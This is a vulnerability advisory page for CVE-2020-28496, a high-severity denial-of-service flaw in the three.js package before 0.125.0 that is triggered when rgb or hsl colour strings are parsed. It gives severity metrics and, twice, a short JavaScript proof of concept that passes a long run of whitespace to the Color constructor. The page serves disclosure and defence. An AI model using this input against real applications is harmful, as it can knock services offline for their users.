CVE-2020-28496

HIGHCVSS 7.5/10EPSS 2.52%

Last modified

CVE-2020-28496 is a high-severity vulnerability rated 7.5/10 on the CVSS scale. This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. EPSS estimates a 2.52% chance of exploitation in the next 30 days.

Description

This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")

Metrics

CVSS 3.1
7.5/10

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

EPSS Probability
2.52%

82.8th percentile

Probability of exploitation in the next 30 days. Learn more

Weakness Enumeration

Affected Software

VendorProductVersions
Three ProjectThree< 0.125.0

References

Timeline

Published
Last Modified
Status
Modified

Frequently Asked Questions

What is CVE-2020-28496?
This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
How severe is CVE-2020-28496?
CVE-2020-28496 has a CVSS score of 7.5/10 (HIGH severity). The EPSS model estimates a 2.52% probability of exploitation in the next 30 days.
How do I fix CVE-2020-28496?
Check the vendor references and advisories linked above for patched versions and mitigation guidance. You can also run a Strix scan to test if your systems are affected.

Are you affected by CVE-2020-28496?

Run a free Strix scan to check your systems for this vulnerability.

Scan your code now

Source: NVD / NIST